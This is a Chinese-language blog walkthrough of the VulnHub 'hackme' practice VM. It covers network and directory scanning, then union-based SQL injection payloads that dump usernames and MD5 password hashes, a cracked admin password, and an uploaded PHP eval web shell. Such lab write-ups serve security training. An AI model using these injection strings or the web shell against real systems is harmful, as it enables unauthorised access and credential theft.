靶机通关 | hackme.ova靶机通关秘籍~

已于 2023-10-19 21:04:00 修改
阅读量166 收藏
点赞数
分类专栏: 靶机合集 文章标签: 网络安全 数据库 sql mybatis
于 2023-10-19 13:48:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50750081/article/details/133774605
版权

一、准备工作

靶场:hackme.ova IP:未知

攻击机:kali IP:192.168.168.128

打开虚拟机 下载靶场

https://download.vulnhub.com/hackme/hackme.ova

之后enter一直到这个位置就好了 开始打开kali复现。

二、信息收集

1. 收集IP

kali与靶场都是NAT模式,之后高级看虚拟机的高级地址。

hackerme:00:0C:29:D3:E6:61

2.主机扫描

(域名放上去也可以扫哦)

nmap 192.168.168.0/24      端口也出来了就不扫了

对比MAC地址,得到hackerme靶机IP:

192.168.168.130

3.目录扫描

(这个比那个字典快 也可以用字典 dirp ip)

dirsearch -u "192.168.168.130"

找出文件存储位置,之后看看那里能上传文件。

http://192.168.168.130/uploads/

输入IP看见能登账号,注册登陆看一下吧。

http://192.168.168.130/login.php

账号:adminsss 密码:adminsss

三、漏洞探测

点击search,看到书籍的一些名称。

1.查看有没有sql注入

1’ and 1=1 --+

1’ and 1=2 --+

有SQL注入。

2.判断字段数

1' order by 3 --+

说明字段数是3。

3.查看数据库

-1' union select database(),2,3 #

4.查看数据库表名

看到数据库中存在books表和users表;猜测users表包含账户信息

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

5.查看users表所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #

6.查看数据

看到超级用户跟相应密码 可是密码是加密得需要MD5解密

-1' union select group_concat(user),group_concat(pasword),3 from users#

user1,user2,user3,test,superadmin,test1,adminsss

5d41402abc4b2a76b9719d911017c592,

6269c4f71a55b24bad0f0267d9be5508,

0f359740bd1cda994f8b55330c86d845,

05a671c66aefea124cc08b76ea6d30bb,

2386acb2cf356944177746fc92523983,

05a671c66aefea124cc08b76ea6d30bb,

c9f4e265338528c2ad45519fc8fbd65a

选择superadmin对应的密码2386acb2cf356944177746fc92523983

superadmin

2386acb2cf356944177746fc92523983

密码解密得:Uncrackable

(解密网站:md5解密 MD5在线解密 破解md5

7.登录进去

进去可以看到上传文件,在上传一句话木马。

shell.php:

<?php phpinfo();eval($_POST['cmd']);?>

再次到文件目录哪里看上传成功没有,上传成功!!!

访问查看

http://192.168.168.130/uploads/shell.php

8.用蚁剑连接

好了拿到shell了。

成功!!!

参考文档:

hackme.ova 拿getshell_pink三石的博客-CSDN博客

(谢谢大家!欢迎提出批评和建议!你的支持是我持续更新的巨大动力!)

溯溯学网安
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1052
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
hackme 边做边记录
m1785717的博客
10-22 596
LFI 在login界面查看源代码得到提示 &lt;a href="?page=pages/flag"&gt;Flag&lt;/a&gt; 想到使用封装协议读取php文件,URL如下: https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag 得到php源码 Q...
OWASPBWA-1.2靶场搭建
qq_41333578的博客
07-03 2643
OWASPBWA是一个靶机系统全家福,直接用VirtualBox或VMware 直接打开即可(官方建议NAT模式) 0x00 搭建环境 1) VirtualBox 2) OWASP_Broken_Web_Apps_VM_1.2.ova 下载靶场 0x01 搭建步骤 1 直接VirtualBox打开ova 我这里要使宿主机访问VirtualBox NAT下的虚拟机,此时另外再配置网络设置,virtualBox NAT下虚拟机能够访问外网和宿主机,但宿主机不能访问虚拟机。 解决方法: 1)配置网络如下图
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 482
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
行业文档-设计装置-自动换靶机和连体靶纸.zip
08-21
《自动换靶机和连体靶纸》是一个深入探讨工业自动化设计的专业文档,主要涵盖了自动换靶机与连体靶纸技术的相关知识。在当前制造业向着智能化、高效化发展的趋势下,这类设备的设计与应用成为了提升生产效率和产品...
无人靶机飞行控制系统.zip
09-19
无人靶机飞行控制系统是无人机技术中的一个重要组成部分,主要用于模拟空中目标,进行军事训练、测试雷达与导弹防御系统等任务。这个压缩包文件包含了对这一系统的详细介绍,主要关注点可能包括飞行控制理论、硬件...
靶机操作规程概述.doc
12-04
【钻靶机操作规程概述】 钻靶机是一种用于在电路板上精确钻孔的设备,主要应用于电子制造行业的PCB(Printed Circuit Board)生产工艺中。本操作规程旨在确保员工能够正确、安全地操作钻靶机,从而提高生产效率,...
无人靶机飞行控制系统.docx
06-20
无人靶机飞行控制系统.docx
一种变体旋翼靶机的制作方法.docx
11-05
【标题】:一种变体旋翼靶机的制作方法 【描述】:该技术涉及飞行器领域的创新,尤其是变体旋翼靶机的设计,旨在解决靶机无法模拟多种旋翼类飞行器雷达散射特征的问题。 【正文】: 在当前的技术背景下,旋翼类...
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
靶机电气系统及具有其的靶机的制作方法.docx
11-21
靶机电气系统应用于靶机中,为靶机上的各种负载提供稳定、高效的电源,优化了靶机的电气性能,降低了制造成本,同时简化了设计和维护流程,适应了靶机作为消耗品的特性,提升了靶机在军事训练中的使用效率和安全性...
medium_socnet靶场
wcl20010的博客
05-02 2727
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个网页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
DC-6靶机实战
qq_43462485的博客
10-30 469
DC-6靶机实战 攻击机:kali 192.168.80.130 目标机: dc-6 192.168.80.129 一、信息收集 1.使用arp-scan -l进行主机发现然后使用nmap扫描端口信息 2.访问网站发现无法解析域名,构建一个curl测试访问,发现域名是wordy添加一下 3.访问成功后发现是典型的wordpress网站,使用wpscan扫描一下 发现了几个用户名 4.使用cewl生成字典爆破失败,查看官网提示https://www.vulnhub.com/en
HA: SHERLOCK 靶机渗透取证
Huangshanyoumu的博客
10-18 2782
HA: SHERLOCK 靶机渗透取证 靶机描述: Description HA: Sherlock! This lab is based on the famous investigator’s journey on solving the Curious Case of Harshit's murder! This is a Forensic based Capture-the-Flag and is not a Boot-to-Root So, put on your thinking cap
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6169
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值